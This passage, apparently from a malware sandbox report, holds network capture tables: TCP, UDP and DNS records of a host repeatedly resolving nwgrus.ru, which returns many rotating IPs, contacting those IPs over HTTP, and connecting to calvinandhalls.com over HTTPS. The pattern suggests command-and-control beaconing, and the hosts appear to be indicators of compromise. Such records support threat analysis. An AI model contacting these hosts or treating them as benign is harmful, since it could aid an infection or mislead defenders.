Oct 3, 2024 23:28:50.255928993 CEST	50021	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:50.298940897 CEST	50021	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:50.298940897 CEST	50021	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:28:50.298990011 CEST	443	50021	23.145.40.162	192.168.2.5
Oct 3, 2024 23:28:50.299007893 CEST	443	50021	23.145.40.162	192.168.2.5
Oct 3, 2024 23:29:16.012449026 CEST	50022	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:16.017987967 CEST	80	50022	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:16.018183947 CEST	50022	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:16.018275023 CEST	50022	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:16.018275023 CEST	50022	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:16.023675919 CEST	80	50022	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:16.023718119 CEST	80	50022	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:17.365068913 CEST	80	50022	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:17.365807056 CEST	80	50022	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:17.365926981 CEST	50022	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:17.366017103 CEST	50022	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:17.370951891 CEST	80	50022	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:22.473840952 CEST	50023	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:22.479233980 CEST	80	50023	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:22.479305029 CEST	50023	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:22.479424953 CEST	50023	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:22.479453087 CEST	50023	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:22.484585047 CEST	80	50023	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:22.484770060 CEST	80	50023	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:23.861526012 CEST	80	50023	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:23.862622023 CEST	80	50023	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:23.862679005 CEST	50023	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:23.862728119 CEST	50023	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:23.868073940 CEST	80	50023	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:30.832185984 CEST	50024	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:30.838176012 CEST	80	50024	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:30.838270903 CEST	50024	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:30.838433027 CEST	50024	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:30.838433027 CEST	50024	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:30.843635082 CEST	80	50024	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:30.843667984 CEST	80	50024	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:32.215879917 CEST	80	50024	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:32.216645956 CEST	80	50024	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:32.216730118 CEST	50024	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:32.216814041 CEST	50024	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:32.222326994 CEST	80	50024	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:42.047560930 CEST	50025	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:42.052870989 CEST	80	50025	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:42.052973986 CEST	50025	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:42.053097963 CEST	50025	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:42.053114891 CEST	50025	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:42.057972908 CEST	80	50025	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:42.058206081 CEST	80	50025	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:43.489607096 CEST	80	50025	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:43.489631891 CEST	80	50025	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:43.489723921 CEST	50025	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:43.489888906 CEST	50025	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:43.494790077 CEST	80	50025	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:53.002244949 CEST	50026	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:53.007515907 CEST	80	50026	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:53.007617950 CEST	50026	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:53.007772923 CEST	50026	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:53.007807970 CEST	50026	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:53.012799025 CEST	80	50026	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:53.012840986 CEST	80	50026	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:54.424612045 CEST	80	50026	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:54.425292969 CEST	80	50026	190.224.203.37	192.168.2.5
Oct 3, 2024 23:29:54.425367117 CEST	50026	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:54.425440073 CEST	50026	80	192.168.2.5	190.224.203.37
Oct 3, 2024 23:29:54.430339098 CEST	80	50026	190.224.203.37	192.168.2.5
Oct 3, 2024 23:30:04.659269094 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:04.659317017 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:04.659373999 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:04.659753084 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:04.659766912 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:05.289905071 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:05.289990902 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:05.291116953 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:05.291126966 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:05.291480064 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:05.329252958 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:05.329272032 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:05.329338074 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:05.676987886 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:05.677073002 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:05.677365065 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:05.677426100 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:05.677445889 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:05.677453995 CEST	50027	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:05.677459955 CEST	443	50027	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:10.960849047 CEST	50028	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:10.965958118 CEST	80	50028	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:10.966037989 CEST	50028	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:10.966243029 CEST	50028	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:10.966279984 CEST	50028	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:10.971081018 CEST	80	50028	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:10.971223116 CEST	80	50028	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:12.046080112 CEST	80	50028	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:12.051363945 CEST	80	50028	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:12.051513910 CEST	50028	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:12.054625034 CEST	50028	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:12.059895992 CEST	80	50028	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:24.359764099 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:24.359802961 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:24.359873056 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:24.360220909 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:24.360234022 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:24.974380016 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:24.974486113 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:24.975661993 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:24.975675106 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:24.976442099 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:24.977335930 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:24.977385044 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:24.977416992 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:25.258035898 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:25.258205891 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:25.258444071 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:25.273740053 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:25.273789883 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:25.273823023 CEST	50029	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:25.273844004 CEST	443	50029	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:31.539199114 CEST	50030	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:31.896914005 CEST	80	50030	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:31.897072077 CEST	50030	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:31.897259951 CEST	50030	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:31.897284031 CEST	50030	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:31.902146101 CEST	80	50030	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:31.902368069 CEST	80	50030	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:33.007349014 CEST	80	50030	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:33.007472992 CEST	80	50030	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:33.007546902 CEST	50030	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:33.007592916 CEST	50030	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:33.012402058 CEST	80	50030	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:36.177293062 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:36.177372932 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:36.177447081 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:36.177716017 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:36.177750111 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:36.788017988 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:36.788145065 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:36.789207935 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:36.789242983 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:36.789459944 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:36.790157080 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:36.790196896 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:36.790231943 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:37.074385881 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:37.074487925 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:37.074562073 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:37.074645042 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:37.074645042 CEST	50031	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:37.074692011 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:37.074721098 CEST	443	50031	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:44.682951927 CEST	50032	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:44.688327074 CEST	80	50032	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:44.688429117 CEST	50032	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:44.688546896 CEST	50032	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:44.688580990 CEST	50032	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:44.693650007 CEST	80	50032	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:44.693680048 CEST	80	50032	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:45.768537998 CEST	80	50032	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:45.768587112 CEST	80	50032	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:45.768673897 CEST	50032	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:45.768790960 CEST	50032	80	192.168.2.5	187.131.253.169
Oct 3, 2024 23:30:45.773694992 CEST	80	50032	187.131.253.169	192.168.2.5
Oct 3, 2024 23:30:55.321252108 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:55.321307898 CEST	443	50033	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:55.321379900 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:55.321660042 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:55.321681023 CEST	443	50033	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:55.980276108 CEST	443	50033	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:55.980520010 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:55.981451035 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:55.981483936 CEST	443	50033	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:55.982264042 CEST	443	50033	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:55.982970953 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:55.983016014 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:55.983146906 CEST	443	50033	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:56.286880016 CEST	443	50033	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:56.287026882 CEST	443	50033	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:56.287113905 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:56.287288904 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:56.287288904 CEST	50033	443	192.168.2.5	23.145.40.162
Oct 3, 2024 23:30:56.287339926 CEST	443	50033	23.145.40.162	192.168.2.5
Oct 3, 2024 23:30:56.287368059 CEST	443	50033	23.145.40.162	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 23:27:22.646028996 CEST	59238	53	192.168.2.5	1.1.1.1
Oct 3, 2024 23:27:23.722333908 CEST	59238	53	192.168.2.5	1.1.1.1
Oct 3, 2024 23:27:24.727400064 CEST	59238	53	192.168.2.5	1.1.1.1
Oct 3, 2024 23:27:24.944288015 CEST	53	59238	1.1.1.1	192.168.2.5
Oct 3, 2024 23:27:24.944324017 CEST	53	59238	1.1.1.1	192.168.2.5
Oct 3, 2024 23:27:24.944351912 CEST	53	59238	1.1.1.1	192.168.2.5
Oct 3, 2024 23:28:26.404886961 CEST	61096	53	192.168.2.5	1.1.1.1
Oct 3, 2024 23:28:26.650834084 CEST	53	61096	1.1.1.1	192.168.2.5
Oct 3, 2024 23:30:08.620316029 CEST	51844	53	192.168.2.5	1.1.1.1
Oct 3, 2024 23:30:09.617832899 CEST	51844	53	192.168.2.5	1.1.1.1
Oct 3, 2024 23:30:10.633510113 CEST	51844	53	192.168.2.5	1.1.1.1
Oct 3, 2024 23:30:10.960089922 CEST	53	51844	1.1.1.1	192.168.2.5
Oct 3, 2024 23:30:10.960134029 CEST	53	51844	1.1.1.1	192.168.2.5
Oct 3, 2024 23:30:10.960165977 CEST	53	51844	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 23:27:22.646028996 CEST	192.168.2.5	1.1.1.1	0x5921	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:23.722333908 CEST	192.168.2.5	1.1.1.1	0x5921	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.727400064 CEST	192.168.2.5	1.1.1.1	0x5921	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:28:26.404886961 CEST	192.168.2.5	1.1.1.1	0xcd36	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:08.620316029 CEST	192.168.2.5	1.1.1.1	0x217e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:09.617832899 CEST	192.168.2.5	1.1.1.1	0x217e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.633510113 CEST	192.168.2.5	1.1.1.1	0x217e	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 23:27:16.410582066 CEST	1.1.1.1	192.168.2.5	0x234c	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2024 23:27:16.410582066 CEST	1.1.1.1	192.168.2.5	0x234c	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:16.519319057 CEST	1.1.1.1	192.168.2.5	0x77aa	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:16.519319057 CEST	1.1.1.1	192.168.2.5	0x77aa	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:17.066559076 CEST	1.1.1.1	192.168.2.5	0xcc81	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2024 23:27:17.066559076 CEST	1.1.1.1	192.168.2.5	0xcc81	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		181.128.22.240	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		211.168.53.110	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		201.233.78.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944288015 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		181.128.22.240	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		211.168.53.110	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		201.233.78.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944324017 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		181.128.22.240	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		211.168.53.110	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		201.233.78.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:27:24.944351912 CEST	1.1.1.1	192.168.2.5	0x5921	No error (0)	nwgrus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:28:26.650834084 CEST	1.1.1.1	192.168.2.5	0xcd36	No error (0)	calvinandhalls.com		23.145.40.162	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		187.204.9.111	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		183.100.39.16	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		189.165.155.245	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960089922 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		187.204.9.111	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		183.100.39.16	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		62.150.232.50	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		189.165.155.245	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960134029 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		187.204.9.111	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		183.100.39.16	A (IP address)	IN (0x0001)	false
Oct 3, 2024 23:30:10.960165977 CEST	1.1.1.1	192.168.2.5	0x217e	No error (0)	nwgrus.ru		175.119.10.231	A (IP address)	IN (0x0001)	false
